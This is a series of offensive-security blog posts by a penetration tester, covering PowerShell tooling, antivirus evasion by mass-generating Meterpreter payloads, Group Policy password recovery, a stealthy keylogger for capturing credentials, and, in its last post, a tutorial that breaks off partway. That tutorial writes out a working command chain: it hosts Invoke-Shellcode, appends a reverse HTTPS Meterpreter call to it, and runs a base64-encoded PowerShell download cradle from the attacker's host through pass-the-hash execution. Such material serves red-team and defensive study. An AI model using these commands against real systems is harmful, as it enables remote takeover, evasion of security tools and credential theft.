Recently, we added support for two things to the function which I found helpful on a recent engagement. Both are simple enhancements that come with the PowerShell language that you may want to implement in your tools.<br />
<br />
The first is the use of the <a href="http://technet.microsoft.com/en-us/library/hh849951.aspx">Write-Verbose</a> cmdlet which is a <a href="http://technet.microsoft.com/en-us/library/hh847884.aspx">Common Parameter</a>. That means it comes free when you declare your parameters with "[CmdletBinding()]" and then can be called by adding the "-verbose" switch when the function is called. Optionally, it can be enabled by changing $VerbosePreference, but by default it doesn't show anything. In the case of Invoke-ReverseDnsLookup, I added it to the function to be able to see what IP address it was currently trying to resolve. Since verbose statements are written to the console and not the output pipeline, you can use any of the "out-*" without it being cluttered with messages.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJcxVuzb7u2fcPQ87R8hMjOie4314tQ3yap2e-I8TEDm_fpvyL-HYjw6xBznT8KaXsezZRAgDisveT8ht6p-uFVjkBCvZdZWelvVt3e6H0VII7PSv3SiK8_JRkUi0RcSjvEJNbbbXdfl0/s1600/verbose.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJcxVuzb7u2fcPQ87R8hMjOie4314tQ3yap2e-I8TEDm_fpvyL-HYjw6xBznT8KaXsezZRAgDisveT8ht6p-uFVjkBCvZdZWelvVt3e6H0VII7PSv3SiK8_JRkUi0RcSjvEJNbbbXdfl0/s1600/verbose.PNG" height="203" width="400" /></a></div>
<br />
The next feature of PowerShell that we added is support for input from the <a href="https://blogs.technet.com/b/heyscriptingguy/archive/2011/05/10/use-the-pipeline-to-create-robust-powershell-functions.aspx">pipeline</a>. Pipeline input allows functions to be chained together and allows developers to focus on doing one thing. Where input is coming from and how the output is parsed or stored should be handled by the user. For example, I had a text file of several different network ranges and IP addresses that I wanted to be able to pass to Invoke-ReverseDnsLookup, but it didn't support it. Fortunately, it is simple to add support to your tools. The first thing you need to do is decide what logic (if any) only needs to happen once at the beginning or at the end of the script. In our case, Matt wrote a function to break out and validate CIDR ranges into individual addresses. We don't need to declare that function for every IP address, so we will create a BEGIN script block: <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYgEfJGeBHDH9LsnfjeeSy5kQLnnBRckhHQEF0j_olsq6OHGB1j7Db9oFfH5WeJFTDvZNnJCorNZhJSH3yiO2zb5YmZUgQXvfPnUJR1CSM7yxI6lyw3Dc0jmzZXe9MdM03vlSNye2-KFE/s1600/begin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYgEfJGeBHDH9LsnfjeeSy5kQLnnBRckhHQEF0j_olsq6OHGB1j7Db9oFfH5WeJFTDvZNnJCorNZhJSH3yiO2zb5YmZUgQXvfPnUJR1CSM7yxI6lyw3Dc0jmzZXe9MdM03vlSNye2-KFE/s1600/begin.png" height="211" width="400" /></a></div>
<br />
The only required script block is PROCESS. That is the part that will do the work on each object coming down the pipeline. You can see the PROCESS block above and how the current IP address in the pipeline is reference with the pipeline variable ($_). Once the PROCESS block is done, the optional END block does any post-processing for the function.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinMPu4X8IrOhJGBWQartnNH_ng0cC-VK5_Bcgy9M_qmQi9-KD7G29eyoegs06Il8BVFwBmLeA2JrPYy8iWhQ_IDoG1OXsoWEirK45MvQAbsjacfIhHKtSk2_XqHRfulZMx1iDSzf4pKPE/s1600/dnslookup.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinMPu4X8IrOhJGBWQartnNH_ng0cC-VK5_Bcgy9M_qmQi9-KD7G29eyoegs06Il8BVFwBmLeA2JrPYy8iWhQ_IDoG1OXsoWEirK45MvQAbsjacfIhHKtSk2_XqHRfulZMx1iDSzf4pKPE/s1600/dnslookup.PNG" height="100" width="400" /></a></div>
<br />
<br />
Certainly nothing ground-breaking here, but I thought I would share some neat features of PowerShell and how they can be applied to your tools. It may give you some insight into the "why" behind some of the functions in PowerSploit. Thank you for reading.Chrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com0tag:blogger.com,1999:blog-8453453300736107961.post-9982122811466303112013-09-17T22:13:00.001-04:002013-09-17T22:13:04.795-04:00Hammer Instead of a Scalpel: Brute-force AV Evasion Several years ago, I was on an engagement with <a href="https://twitter.com/passingthehash">Skip</a> where we were faced with the common problem of antivirus evasion for callback binaries. The environment was such that we feared that any custom backdoor or tool would be submitted to an AV vendor so we wanted to use Meterpreter. Obviously, this was before the golden age of <a href="https://github.com/mattifestation/PowerSploit">PowerShell</a>. Skip suggested that we generate hundreds of payloads and scan them locally to see which ones bypass the target product. We knew what the product was, but there are some <a href="http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html">awesome ways</a> of figuring that out. I felt pretty <a href="http://schierlm.users.sourceforge.net/avevasion.html">educated</a> on the topic and concluded that his idea wouldn't work since encoding didn't really matter for executables.<br />
<br />
I was wrong.<br />
<br />
He threw together a bash script to generate payloads overnight and we returned to find around 10 viable binaries that all had different hash signatures and worked:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieM5O5ypO9yHAZyC7EghUIO6AB2pXyspDgJkUtKkh_8_a6P9i_BveklV4tq6wUg78-eKQ5aPZAI00EptMfW_JvLdtZVBDq45NO8JmI7ecPK9YZ5L9-TV3FY6YfkpOjgzZNB7HqNe1u36c/s1600/bash.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieM5O5ypO9yHAZyC7EghUIO6AB2pXyspDgJkUtKkh_8_a6P9i_BveklV4tq6wUg78-eKQ5aPZAI00EptMfW_JvLdtZVBDq45NO8JmI7ecPK9YZ5L9-TV3FY6YfkpOjgzZNB7HqNe1u36c/s400/bash.JPG" width="400" /></a></div>
<br />
I have used this method to general success ever since, but given what we know about how encoding shouldn't really matter, why does this work? I don't know. My best guess is bad signature writing for a known security tool.<br />
<br />
We even took the concept even further when facing multiple products:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmU0Tt6e5O6skYdvQzO4blXswlNGkFvaQxz18zE2zez4-y4vucmnjl5EzGxiBGANtLgo6EV-47ZLnhC8LcG9-4jhzlPODBM5TfN8ciu1Kzcv8tFbElQCaKlMDecdLLFasJjROnrHcNiek/s1600/diagram.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="305" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmU0Tt6e5O6skYdvQzO4blXswlNGkFvaQxz18zE2zez4-y4vucmnjl5EzGxiBGANtLgo6EV-47ZLnhC8LcG9-4jhzlPODBM5TfN8ciu1Kzcv8tFbElQCaKlMDecdLLFasJjROnrHcNiek/s400/diagram.JPG" width="400" /></a></div>
<br />
Testers tend to keep their AV-evasion methods to themselves for obvious reasons, but with the <a href="https://www.veil-evasion.com/">tools</a> available now it's not a huge deal. I am really writing this post to get thoughts as to why this still works. So the script that Skip wrote works, but I really wanted to speed up the process and start up the handler for testing:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjyWbg1jsdHTA665wmRk74NIrJC_a9PXEcIBS-Kb_g8b3OCquoCO2C_d_nr_qd9I09bfTvZ1Lzmm1Bzc6IxgnNnlVNWnw99_gA-866T1Uh9jtMPQdb3l2GkT9St_vabuedTAHM1ISrX1c/s1600/python.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="392" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjyWbg1jsdHTA665wmRk74NIrJC_a9PXEcIBS-Kb_g8b3OCquoCO2C_d_nr_qd9I09bfTvZ1Lzmm1Bzc6IxgnNnlVNWnw99_gA-866T1Uh9jtMPQdb3l2GkT9St_vabuedTAHM1ISrX1c/s400/python.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The python script is on <a href="https://github.com/obscuresec/random/blob/master/GenPayloads.py">github</a> if you are interested in trying this out but your mileage will certainly vary based on the AV product. Over the years, it generally requires more payloads to be created to be successful. Sometimes its in the hundreds, but often its in the thousands. Be careful with disk space since the script doesn't account for that.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
-Chris</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />Chrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com4tag:blogger.com,1999:blog-8453453300736107961.post-64917843020594755922013-07-19T23:50:00.000-04:002013-09-17T22:02:36.012-04:00Guest Blog Posts and ConsI had the pleasure of writing a few guest blogs in the last few weeks. If you haven't read them, please check them out:<br />
<br />
"<a href="http://blogs.technet.com/b/heyscriptingguy/archive/2013/07/12/using-the-windows-api-and-copy-rawitem-to-access-sensitive-password-files.aspx">Using the Windows API and Copy-RawItem to Access Sensitive Password Files</a>" on Microsoft's "<a href="http://blogs.technet.com/b/heyscriptingguy/">Hey, Scripting Guy! Blog</a>" The post covers how to use PowerShell and volume shadow copy to safely copy either the NTDS.dit or SAM files while running as admin. The accompanying script figures out if its running on a DC or not, finds the actual location of the NTDS.dit file from the registry (often installed on a different disk) and returns the VSS service to its original state. You can find the script <a href="http://gallery.technet.microsoft.com/scriptcenter/Get-PasswordFile-4bee091d">here</a>. Although useful in a pinch, there are <a href="http://clymb3r.wordpress.com/2013/06/13/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks/">niftier methods</a> out there.<br />
<br />
"<a href="http://www.pentestgeek.com/2013/09/18/invoke-shellcode/">PowerSploit: The Easiest Shell You’ll Ever Get</a>" on <a href="http://www.pentestgeek.com/">Pentest Geek</a>. The post is a tutorial on the easiest way I know to avoid AV and get a Meterpreter shell from GUI access. I also included a simple Python script (in a PowerShell post,<a href="http://www.obscuresecurity.blogspot.com/2012/11/violent-python-review.html"> really?</a>) to configure the handler for you. You can check that out <a href="https://github.com/obscuresec/random/blob/master/StartListener.py">here</a>, you may find it useful. The Pentest Geek blog is already full of great posts, you should definitely check it out and contribute!<br />
<br />
"<a href="http://passing-the-hash.blogspot.com/2013/07/WMIS-PowerSploit-Shells.html">WMIS: The Missing Piece of the Ownage Puzzle</a>" on the <a href="http://passing-the-hash.blogspot.com/">Passing-the-Hash blog</a>. The post builds on the concepts introduced in the PowerSploit post on Pentest Geek. I wrote about how to use WMIS to get a Meterpreter shell with one command using PowerShell. It is extremely effective, and we will be releasing a tool to automate the entire process very soon.<br />
<br />
Also, I look forward to seeing you again at both <a href="https://www.blackhat.com/us-13/briefings.html#Duckwall">Blackhat</a> and <a href="http://www.derbycon.com/schedule/">Derbycon</a>. Skip and I will be discussing ways to mitigate the threat of the Pass-the-Hash attack at both conferences. Matt and I will be presenting "A Minimalist's Guide to Windows Post-Exploitation" at both <a href="http://www.securitybsides.com/w/page/63108735/BSidesAugusta">BsidesAugusta</a> and Derbycon. Thanks for reading and thanks for contributing to this great community.<br />
<br />
-ChrisChrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com4tag:blogger.com,1999:blog-8453453300736107961.post-65874184338344036962013-07-03T18:13:00.000-04:002013-07-03T21:46:47.368-04:00Get-GPPPassword ReduxIts been over a year since I threw together the original <a href="http://obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html">Get-GPPPassword</a> on a short flight and I was really having a hard time even looking at the code. In addition to a nagging bug, it needed to be rewritten and updated to include all the great recommendations from you guys. Its amazing how often I still see local passwords being enforced with Group Policy preferences. For some reason it actually feels like the problem is getting worse even with Microsoft's blatant warnings in Server 2012. The other issue that I have seen is that when administrators stop using preferences, the old XML file is not deleted. On more than one engagement I have found an old password which helped me guess the current one. We need to keep hammering at this poor practice.<br />
<br />
Additionally, one of the things that jumped out at me while reworking this script is the simplicity of this task in PowerShell. Compared to accomplishing the same task in <a href="http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/credentials/gpp.rb">Ruby</a>, PowerShell's XML parsing really gives it an edge. A lot of security professionals could benefit by spending a few days to learn it and <a href="http://www.darkoperator.com/">Carlos Perez</a> is teaching an awesome class at <a href="https://www.derbycon.com/training-courses/#intropower">Derbycon</a>!<br />
<br />
Updates:<br />
<br />
General flow, performance and bug fixes including better error handling and a <a href="https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1#L41">fix</a> for the problem with how the base64-encoded string was being padded.<br />
<br />
Support for parsing not only groups.xml, but also scheduledtasks.xml, services.xml and datasources.xml. The <a href="http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences">original post</a> that inspired me to write the function appears to be down, but there have been other <a href="http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html">posts</a> that point out that passwords can be stored in other Group Policy preference files as well. I attempted to create each one of those XML files and created <a href="https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1#L85">logic</a> for the 4 that seem used.<br />
<br />
<a href="http://www.myotherpcisacloud.com/post/2012/05/29/Group-Policy-Preferences-Passwords-Continued.aspx">Ryan Ries</a> pointed out that the script could easily be pointed at the <a href="https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1#L68">domain controller</a> which removes the need for any parameters and makes the script easier to run:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg05ZNEhFZEDIm27-p0mMHoyi-gqqd2FwsH_VDsvGnbuBQaV9enlyR3V2XOi8YEUfnlxE_ajRNxawRtc3NtR2B3_J9tM0nRl-ruENopij0DNhGWgTbgHiInuhSd6ZyVM5FynoIHOKucC3g/s987/get-gpppassword.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg05ZNEhFZEDIm27-p0mMHoyi-gqqd2FwsH_VDsvGnbuBQaV9enlyR3V2XOi8YEUfnlxE_ajRNxawRtc3NtR2B3_J9tM0nRl-ruENopij0DNhGWgTbgHiInuhSd6ZyVM5FynoIHOKucC3g/s400/get-gpppassword.png" width="400" /></a></div>
<br />
I broke out the decryption function (<a href="https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1#L33">Get-DecryptedCPassword</a>) If you want to decrypt a password offline, you can use that.<br />
<br />
As always, the most current version of the Get-GPPPassword is available from the <a href="https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1">PowerSploit Github </a>page. Thanks for reading, keep the comments and recommendations coming and join <a href="http://passing-the-hash.blogspot.com/">Skip Duckwal</a>l and I at <a href="https://www.blackhat.com/us-13/briefings.html#Campbell">BlackHat</a> where we will briefly discuss Group Policy preferences in relation to the Pass-the-Hash attack with practical mitigation techniques.<br />
<br />
-ChrisChrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com10tag:blogger.com,1999:blog-8453453300736107961.post-24679981559740786372013-06-30T12:46:00.001-04:002013-06-30T12:56:12.002-04:00Logging Keys with PowerShell: Get-KeystrokeI was recently inspired by <a href="http://www.exploit-monday.com/">Matt Graeber's</a> series of posts on Microsoft's <a href="http://blogs.technet.com/b/heyscriptingguy/archive/2013/06/25/use-powershell-to-interact-with-the-windows-api-part-1.aspx">"Hey, Scripting Guy! Blog"</a> to go back and look at old scripts and implement reflection. One of the scripts that I use regularly and mentioned in a<a href="http://www.obscuresecurity.blogspot.com/2013/01/Get-TimedScreenshot.html"> previous post</a> is a keylogger. Generally, I use keyloggers in one of two ways. The first way is to keep a record of every key I press with a timestamp for logging purposes during pentests or incident response activities. The other is to collect password credentials in a post-exploitation scenario. Both of these scenarios require a script that has a minimal forensic footprint.<br />
<br />
There are a lot of keyloggers out there that make use of GetAsyncKeyState, GetKeyboardState and VirtualKeyCode and if you have ever written or used one, you know it isn't an exact science. There are even examples of other <a href="https://code.google.com/p/nishang/source/browse/trunk/Keylogger.ps1">PowerShell keyloggers</a>. A preferred method would be to hook each window with SetWindowsHookEx but there are several security products that flag on that behavior, so I avoided it. <br />
<br />
In the script that originally wrote early last year, I made use of Add-Type to interact with user32.dll (it was included in the<a href="https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot"> Invoke-TwitterBot</a> <a href="http://www.obscuresecurity.blogspot.com/p/presentation-slides.html">presentation</a> ). If you have read Matt's posts, then you understand why that is not ideal. A few requirements that I had were tracking of special characters such as [Shift] and [Caps Lock] which are really important. VirtualKeyCode doesn't track all common characters so I had to map the other ones:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvLyVPRprO3YnxIdu5K_9EAVNC351CHZoYJfJt9N_-Ifk_095fCn3K9yAlARxPmvayQLx4cxP9oCuaLVAekimL1S3kf-V5jPKxWMhwoPMH7Ippy6xwqqFRHPbsUSwTeuH1r_9Au711CRs/s1078/keylogger_Screenshot1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="243" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvLyVPRprO3YnxIdu5K_9EAVNC351CHZoYJfJt9N_-Ifk_095fCn3K9yAlARxPmvayQLx4cxP9oCuaLVAekimL1S3kf-V5jPKxWMhwoPMH7Ippy6xwqqFRHPbsUSwTeuH1r_9Au711CRs/s400/keylogger_Screenshot1.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
I also needed to capture the window title and a date time group which is really simple once you load GetForegroundWindow:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjClWH3xH8rMtgGlFSC_pdUAFBNdChPA7Cgi55M7lHetBe5icT6KCmGBIDeQrKS9YMjRjvzrLprgi-fthKLiRUc6Adlyza9LkRPwVuPWjvxenmLBm_ZnGHxLKWsjx1gzccqxIlnZDv71vA/s1036/keylogger_screenshot2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="51" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjClWH3xH8rMtgGlFSC_pdUAFBNdChPA7Cgi55M7lHetBe5icT6KCmGBIDeQrKS9YMjRjvzrLprgi-fthKLiRUc6Adlyza9LkRPwVuPWjvxenmLBm_ZnGHxLKWsjx1gzccqxIlnZDv71vA/s400/keylogger_screenshot2.png" width="400" /></a></div>
<br />
Ultimately, the exercise of properly using reflection proved too much of a challenge for me and I reached out to the professional. Matt made short work of it and together we have a script that meets the standards for inclusion in the <a href="https://github.com/mattifestation/PowerSploit">PowerSploit project:</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiNonK12m0Mq472O9WCrbW2TXv3j0w5JWo_Cq8xj9KROt0EzghsJ-DiSGlEBDtSc7dQ4Fnd3hOGSh3OwXc9B7w_7bCw1Z1YoFCY20Sd749jHxcDMx-EIKlinUvAGF-His-p6Hn58wRFUc/s877/keylogger_screenshot3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiNonK12m0Mq472O9WCrbW2TXv3j0w5JWo_Cq8xj9KROt0EzghsJ-DiSGlEBDtSc7dQ4Fnd3hOGSh3OwXc9B7w_7bCw1Z1YoFCY20Sd749jHxcDMx-EIKlinUvAGF-His-p6Hn58wRFUc/s400/keylogger_screenshot3.PNG" width="400" /></a></div>
<br />
The full script is available on the <a href="https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1">PowerSploit</a> Github page. We hope you find the script useful.<br />
<br />
-ChrisChrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com4tag:blogger.com,1999:blog-8453453300736107961.post-9037287492410395472013-04-30T18:38:00.001-04:002013-05-02T00:40:19.081-04:00BSides Puerto RicoIts been a few weeks and my tan (burn) is gone, but I wanted to write a quick post about my time at <a href="http://bsidespr.org/">BSides Puerto Rico</a>. It was an awesome conference and a great venue. Although it was Puerto Rico's first security conference, it certainly didn't feel that way. The people that put the conference together were professional and obviously worked their butts off to make it happen. For a small con, it had some nice amenities such as an upscale venue and lunch.<br />
<br />
There were some great talks as well. If you get a chance, check out Royce Davis' talk "<a href="http://www.youtube.com/watch?v=m_DljtmgQKg">Owning Computers without Shell Access</a>" It was my favorite talk, but there were plenty of other great talks. I am sure the other talks will find their way online shortly.<br />
<br />
I imagine BSidesPR will be much bigger next year and I think its well worth the cost. The actual conference was under $100 and a flight to Puerto Rico was much more affordable than I thought it would be. The weather was perfect, the talks were good and I made some new friends! Sign me up for next year and they even made this cool con wrap-up <a href="http://www.youtube.com/watch?v=8z2YswVu1lw">video</a>.<br />
<br />
-ChrisChrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com0tag:blogger.com,1999:blog-8453453300736107961.post-4820458970226199972013-03-28T01:10:00.001-04:002013-08-08T01:43:41.960-04:00PowerSploit + Metasploit = Shells<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
Metasploit has supported psexec-like functionality with pass-the-hash for several years. Unfortunately, its mostly useless when an AV product is there to delete the uploaded service binary. Recently, a module (/auxiliary/admin/smb/<a href="http://www.pentestgeek.com/2013/01/10/psexec_command-not-your-daddys-psexec/">psexec_command</a>) was created that allows you to run a single Windows command with discovered hashes or credentials. This doesn't flag AV, but isn't the full meterpreter shell that we're use to. How can we turn <a href="http://www.obscuresecurity.blogspot.com/2012/04/command-injection-to-code-execution.html">one command</a> into a meterpreter shell? With <a href="https://github.com/mattifestation/PowerSploit">PowerSploit </a>and <a href="http://www.exploit-monday.com/">Matt Graeber's</a> <a href="https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1">Invoke-Shellcode</a>!</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The basic steps:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK_iHXeUwoIFxbLVOmba6BjDCzGUWr4QP1F3WtSSqBnIWbdoeV5CkdLGDbrHZfYmOu-CsH8qZutGn_J5dKuLYolUQe2hXwAwydWlXiOvz3Qk9Z8D-oY8I7tR4cn0JwxFCpOkIZKT2EX5g/s1600/diagram.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="315" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK_iHXeUwoIFxbLVOmba6BjDCzGUWr4QP1F3WtSSqBnIWbdoeV5CkdLGDbrHZfYmOu-CsH8qZutGn_J5dKuLYolUQe2hXwAwydWlXiOvz3Qk9Z8D-oY8I7tR4cn0JwxFCpOkIZKT2EX5g/s400/diagram.png" width="400" /></a></div>
<br />
Kali Linux is awesome, but the <a href="http://bugs.kali.org/view.php?id=124">version of PowerSploit</a> is currently outdated, so lets pull down the script we will eventually run:<br />
<br />
<span style="background-color: white; color: #333333; font-family: Consolas, 'Liberation Mono', Courier, monospace; font-size: 12px; line-height: 16px; white-space: pre;">wget -O /var/www/payload https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1</span><br />
<div>
<span style="background-color: white; color: #333333; font-family: Consolas, 'Liberation Mono', Courier, monospace; font-size: 12px; line-height: 16px; white-space: pre;"><br /></span></div>
<div>
Next we need to append the appropriate function call with LHOST and LPORT parameters and ensure that Apache is running.</div>
<div>
<span style="background-color: white; color: #333333; font-family: Consolas, 'Liberation Mono', Courier, monospace; font-size: 12px; line-height: 16px; white-space: pre;"><br /></span></div>
<div>
<span style="background-color: white; color: #333333; font-family: Consolas, 'Liberation Mono', Courier, monospace; font-size: 12px; line-height: 16px; white-space: pre;">echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Force" >> /var/www/payload</span><br />
<span style="background-color: white; color: #333333; font-family: Consolas, 'Liberation Mono', Courier, monospace; font-size: 12px; line-height: 16px; white-space: pre;"><br /></span>
<span style="background-color: white; color: #333333; font-family: Consolas, 'Liberation Mono', Courier, monospace; font-size: 12px; line-height: 16px; white-space: pre;">strings -es /var/www/payload</span></div>
<div>
<span style="background-color: white; color: #333333; font-family: Consolas, 'Liberation Mono', Courier, monospace; font-size: 12px; line-height: 16px; white-space: pre;"><br /></span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZS1TmuRQSQSLUonLlFSJf8Wg9GdfPBgVDaCTnp9zWOI7pVp4Sl6v9bZY0pJgzMIxWg-V5EKMzE2spmyKboQ96uVW5IdcsYvmr7R5OOiNm0i0xwCln09iqHhI2vSbnAxzDbjQsyFglcKg/s1600/setup.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="270" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZS1TmuRQSQSLUonLlFSJf8Wg9GdfPBgVDaCTnp9zWOI7pVp4Sl6v9bZY0pJgzMIxWg-V5EKMzE2spmyKboQ96uVW5IdcsYvmr7R5OOiNm0i0xwCln09iqHhI2vSbnAxzDbjQsyFglcKg/s400/setup.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Call to Function Added</b></td></tr>
</tbody></table>
Now that we have the script hosted, we need to build the command we want to execute. Although we could encode the entire command, I have found that building a small staging script is far more reliable. We can use the same method as described in a <a href="http://www.obscuresecurity.blogspot.com/2013/02/diy-phishing-exercises-with-powershell.html">previous post</a>.<br />
<div>
<br /></div>
<div>
Basically, we are going to Base64 encode our short script block which will pull down the rest of our script: </div>
<div>
<br /></div>
<div>
<pre style="border: 0px; color: #333333; font-family: Consolas, 'Liberation Mono', Courier, monospace; font-size: 12px; line-height: 16px; padding: 0px;"><div class="line" id="LC66" style="border: 0px; margin: 0px; padding: 0px 0px 0px 10px;">
<span class="nv" style="border: 0px; color: teal; margin: 0px; padding: 0px;">scriptblock</span><span class="o" style="border: 0px; font-weight: bold; margin: 0px; padding: 0px;">=</span><span class="s2" style="border: 0px; color: #dd1144; margin: 0px; padding: 0px;">"iex (New-Object Net.WebClient).DownloadString("</span>http://<span class="nv" style="border: 0px; color: teal; margin: 0px; padding: 0px;">$lhost</span>/payload<span class="s2" style="border: 0px; color: #dd1144; margin: 0px; padding: 0px;">")"</span></div>
<div class="line" id="LC68" style="border: 0px; margin: 0px; padding: 0px 0px 0px 10px;">
<span class="nv" style="border: 0px; color: teal; margin: 0px; padding: 0px;">encode</span><span class="o" style="border: 0px; font-weight: bold; margin: 0px; padding: 0px;">=</span><span class="s2" style="border: 0px; color: #dd1144; margin: 0px; padding: 0px;">"`echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0`"</span></div>
<div class="line" id="LC70" style="border: 0px; margin: 0px; padding: 0px 0px 0px 10px;">
<span class="nb" style="border: 0px; color: #0086b3; margin: 0px; padding: 0px;">command</span><span class="o" style="border: 0px; font-weight: bold; margin: 0px; padding: 0px;">=</span><span class="s2" style="border: 0px; color: #dd1144; margin: 0px; padding: 0px;">"cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc $encode"</span></div>
<div class="line" id="LC70" style="border: 0px; margin: 0px; padding: 0px 0px 0px 10px;">
<span class="nb" style="background-color: white; border: 0px; color: #0086b3; margin: 0px; padding: 0px;">echo</span><span style="background-color: white;"> </span><span class="s2" style="background-color: white; border: 0px; color: #dd1144; margin: 0px; padding: 0px;">$command</span></div>
</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBvsWncV8A9sXhLVp4GoQztK1vczG8_egNQXXoWlzOU2_TxLYx7p_PfxwIcwqexhAbZXtMoCMgPWADLeR0UEUTFnbEh6zy6mhORdLn7QMpeGUk9kKloYSPqRueHncg-XsNjiKMUExFKSI/s1600/fixed_encoding.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="83" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBvsWncV8A9sXhLVp4GoQztK1vczG8_egNQXXoWlzOU2_TxLYx7p_PfxwIcwqexhAbZXtMoCMgPWADLeR0UEUTFnbEh6zy6mhORdLn7QMpeGUk9kKloYSPqRueHncg-XsNjiKMUExFKSI/s400/fixed_encoding.JPG" width="400" /></a></div>
<br />
<br />
Now we fill in the rest of the settings of the module (either a password or hash) and use the COMMAND parameter to the encoded command:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
